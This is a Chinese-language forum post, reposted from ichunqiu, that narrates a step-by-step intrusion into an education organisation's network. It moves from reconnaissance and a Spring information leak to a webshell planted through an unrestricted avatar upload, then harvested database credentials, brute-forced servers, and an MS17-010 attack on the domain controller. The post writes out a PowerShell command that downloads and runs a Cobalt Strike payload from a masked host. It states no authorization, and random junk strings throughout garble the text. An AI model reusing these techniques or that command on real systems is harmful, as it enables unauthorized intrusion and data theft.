|
- r6 `! k2 T O! G/ P6 [ 这次渗透是一个从0到1,从外网到拿下域控的实战过程,希望可以给大家一些思路
2 i" B! @+ J. ~1 ^4 f2 P : H. a# b: \7 w2 {/ M: B
: c# z% ?3 D$ a
% {( c- l* `. [, s; _0 b
7 a$ p7 Q; {2 Q+ |; T; u9 k
$ H3 B8 f/ _( {* C: R 正文9 W2 K% |( c" i# n6 I( d
4 g& x+ j6 K$ \) c I* f. C6 W5 q* E
0 j# y% J7 O1 R" l/ b# i + Z- E' W$ m7 T! ?7 u# @
' J; e! x8 R4 U. Y. {7 u8 J6 T! V: ?
8 q* N4 T6 `- b/ I. P" A7 R* {
目标:www.xxxx.com(一家教育机构)
) w8 R8 G9 ~# L6 H打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能
6 W/ p4 h N. o% h* q) p
+ w! M0 k/ g% u7 W: V
" g; `+ E3 Y$ p: Y 
' { e1 I2 P0 Z1 _. [$ t ~7 H
; c# Q1 m* g0 X; b+ G* P' M8 K( ^8 z+ d
进行了简单的信息搜集
' n# B' N* R! }0 I6 N( v
! c8 D- }' X) W$ \/ K7 ~: d* Y4 O" \
3 Z3 G! G% X2 |5 X; }+ A7 ?) ?
. x- a- l7 o8 o" r" N3 T1 I, l2 ~
子域名搜集
1 Z' w+ ]8 J3 G/ `6 k' ?: \ ' S. W. Z: W* b1 t6 u8 a
4 `/ U( C* A% f# ?6 q( R/ [ R& N6 e
 6 _+ e& ~- w _0 u5 X+ Y) ^- h
! [% d O& ^ i9 O9 Y2 D9 A3 D
( m$ Z4 y) m$ D1 w& \8 q: o& k fofa找资产
% D$ E8 m7 I+ X, ^+ {6 N" l
: a5 x" }. q; J# \4 L/ _
' s( }7 A3 Y. N% Z* _7 O
4 ~: }) T, U1 x3 ~9 d( a3 f/ j" W+ [0 k1 P
 , b! y2 X/ d+ C' M V
5 r2 t2 B% J+ i$ y1 Z2 V
9 S& y2 K1 ~# ^ 一共七个资产。去重之后只有两个。
1 i. J) Q0 G: @9 ]( [0 l9 ~5 l
# i* N E p6 a$ T* |4 e
4 g6 }0 I$ |7 X! J7 |/ K$ W
# Z7 [- v: T! `& c* h7 y) v" P1 K! C5 K0 F t' e% }9 ], n
目录探测
3 t6 n% V7 ]3 y1 R C # j8 H( @( R! R9 Y( a4 D( d
& X; s5 q2 d& U' z, l! D6 J8 j
, o4 w6 b! n* Z3 }6 l" D 9 {% q4 t% C) d5 B, U' Y
2 q' H# }& j6 ?+ K/ L 我尝试了暴力枚举,看有没有弱口令之类的,然而并没有
9 w l: k6 a7 M0 F2 r0 U5 F: ]0 N
5 ]' ^/ x; ]" D* Y5 k9 M: k o% @! y8 Q, Y. s# w# B
5 ~/ U: ]+ z; m6 F" X, w+ j
q0 ]# l4 B6 n u3 U
我又尝试了通过修改返回包来绕过登录界面
0 J# \6 ~6 U7 c 7 P( c) w; k6 e$ t( k* S9 f
0 I# w6 w2 {2 ~/ Y0 ^& w3 {
& x6 v- U; T B% ^ 6 X! m* v4 U! P' w3 X k
) u1 g: F7 k8 n; l
还是不行,尝试注入无果* _/ a$ Z# S; ^7 [5 ]
3 `7 _5 J$ w5 |/ @) T' b
+ W! A, a/ Y0 w; k5 `7 ?; n+ @
 / t6 z" ]! o/ D. Z, e( x3 X ?
' u0 R; E( S% {# {1 B; J8 o! v5 p, B: Q9 Z! b# l8 c/ n
不过我目录探测出了一处Spring信息泄露
# W9 o4 }& m: Y) {9 V, d
J# U( p5 \% R3 ?, Y
, ~( q. @: u# G4 A z- H
# C4 | b w: v# w& S' O0 g6 Q4 S# [6 C2 z
5 ]# U; N& V8 C0 H 0 Y- g8 V1 p$ n, K
8 d+ C+ ?& ~ I, y 尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录
7 [% H; D/ O! X `: I/ H( M! g 4 V% m* `6 n+ R K- N0 ?4 N( e: X
0 o5 g& a- R0 ^: s! K5 h# }8 ]  ; ~. ]6 C: Y# M7 G' Y
4 b2 R- {' {3 y, \1 K9 L
# } N+ D- ^ z% A* r4 ^. A 后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。
$ ~ L/ I* i, R& I+ s
0 c. c0 ] s) e+ u0 f( I5 I+ b5 A2 _& y0 _. q; J' G! i: r6 V
 7 _- T U; t: ^" r6 E3 m
4 j; ~$ G/ ]' P6 b" O& K) o, x4 L! Q
获取有些师傅到这一步就手机抓包电脑测了。
2 d" }% z4 Y+ @( [- f # [# U/ t9 j l4 Y
+ ^$ F- {. I z, U
Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。
" H0 L6 _( A& y! U2 Y
# c9 L* V1 {/ b4 y* @. V3 W; Z3 ]
其中在一个公众号发现了小程序,可以进行注册。
( V _# P# Z4 _) W1 J- h$ n1 @9 } |3 m( C% v! C$ r
( V, r! G6 K- E; ?- }6 X4 t 看到了头像上传,尝试上传获取WebShell" D2 @2 U7 Z/ R6 S" P
; q; r( P5 q( J' G8 v. _8 e9 C, J( c# ^$ Q# ^% Z7 i8 i
+ h, f6 n9 m2 Y, k; R1 n
' k" }/ r3 ~ D' v
! i+ s5 ]; O; m/ q 未做任何限制成功GetShell,上了冰蝎马,目录没权限访问2 F& I4 C; |% f3 o1 _3 h# u
. a. z7 Z- b' f5 A) {1 k1 B4 i
1 H* w; X ^. L8 t, Z/ Z  : T7 P4 o0 c9 N- j3 I: g8 C
. a, n# }" |2 U f: S; o
! U' y0 m4 C- d4 p& B 然后上了大马
& M: P9 G. X% u2 z: {
6 \/ N( P1 c+ g" t2 l: y3 U" m/ L2 S. C- }. X- u
 9 k9 ~8 N' Q7 y; W7 ^. ?3 C
$ N+ U0 e0 a4 R( \. _8 k5 @9 @( u) G. O" u
7 W& g8 e* A& n7 A+ o & e, J8 X* i* a
( l. b; n2 B* j6 } @# E 通过翻找文件发现数据库账号密码4 m# p6 c* F0 u+ I2 m; r
$ q+ A) a, w( E u5 |9 o- G, c& `
" J# g/ y/ d# l 
0 f; m! A" c) p5 S8 b1 X 1 O; f# k* R+ L9 l/ u @( S7 v
5 G$ U( t6 u3 l0 n$ P7 {/ j --内网渗透
4 R/ c6 b( W3 S# q: M, \1 y% m% E% H * z. _3 k0 |3 q" B% w0 T' s
/ F3 X. R% l; N% p5 y# P
直接通过powershell执行 cs上线
1 F2 @' y& |& i" A: z2 n ) F9 A. d7 K# r7 O& Q
1 E8 }6 b3 i5 A% T powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))"7 R& M. j, L' C* s( S# O5 X- g
/ ~5 r) D7 J& U- \7 ?% f' T, d
& _/ v0 k" a+ |# s4 O. X( ]
 ' P: o) @: n b& t! f+ _
7 |' ^( P, \7 Z) R% ^: N
, a% r2 c Z: y4 s+ m- d9 ^
进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破
' W7 o8 }- U5 N {0 t. S& Q * ?( r6 B8 P# p2 D7 u ]) f
3 m) z7 M) e8 \6 Z/ L
6 ?* `' n2 v. C& Q$ H5 w ! l5 Z6 i5 q- \7 \5 V7 m
X8 e! r8 j5 V
登录爆破出来的服务器,发现多网卡且存在逻辑隔离。
" _! z. P+ }1 F" ~% v Q8 o; B
( q7 x% P/ s: L6 E7 l
D: g* {3 @/ ]" e* m7 O4 z
7 E) R/ G9 j* P- J" P" Z9 j. v 5 L- B1 a6 v2 u! s8 w# |9 T
: o7 h5 v* m6 ^% ^  / b7 C$ d& U3 t4 Y( I
, W8 w: t# y$ M% J4 Y0 o. }
( ^/ |! a( y. _: ]! V9 y 通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭
3 v) x" ^ U/ U7 v4 s6 k; y
. F/ @+ @3 y9 B9 D4 Z- M6 h1 I9 s0 i8 D a1 v
6 x$ ] P: i# J; g2 k: g
8 g' F4 U3 N# ^5 U
2 v! ]7 B+ z) z: I" z- C3 G : o( b2 y+ k5 n ?
0 d; r4 K/ x" `
1 J' ~+ ~& k! v6 o" ?
1 h4 a7 ?3 |0 ~/ d- S$ B+ Q, F8 i6 I0 n, Q% y& y( H0 }" R
+ {& O. H5 R' W+ D2 n7 p
. r- j8 V6 Z4 R X3 V: x7 K( C1 F
$ q& T5 E# U M9 R$ j
1 }% W+ O# A6 n# w0 b) e4 O% W; U* a8 w9 s P0 Y; E. n: P) ^; z
小结
5 ~! }7 E C+ w/ g! a7 ` $ r s5 z) P, I# X U' ~
* T8 g% S0 Z* [2 _9 s
' T7 s$ k; ^! t3 Z. I9 ]. Q
1 ]: D" m" G; [: C2 T+ S9 a# B1 {( c
! O" o1 m1 U# m" P3 \ 在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路!6 I7 Y9 Q6 [1 Z
9 E$ u X7 Q! f, G: y4 S. Q D. a3 W5 S% G# [/ B% V" v
. x( {. L- F E2 R
$ W, |4 U3 P k- g$ |6 ` C
) ~& Y9 J2 j% B8 E/ K( H# W - , r" e: B) h- y, s9 ~
0 @5 Y$ T8 C& b, a" F# o
, r- [" I0 p0 _5 H& H) n
- + y! u \4 Y2 L B* O9 t9 q7 L3 l3 l
( P3 ]8 s, t2 _0 X# P9 c1 d
! q9 r* ^4 q" K+ l" {3 e; L: J
+ E3 n0 H5 u# d0 }4 Q5 A/ M; ~# X1 A) R: d
作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html
: T+ D* x) z) Z9 i# \& B1 A8 }5 q
* k3 ^( T5 c7 a3 E% W" _$ x
) u C. I5 P: W3 z % p) y" z T# I6 B6 V# j0 b+ y
| 
发表于 2024-3-1 19:41:32
收藏
支持
反对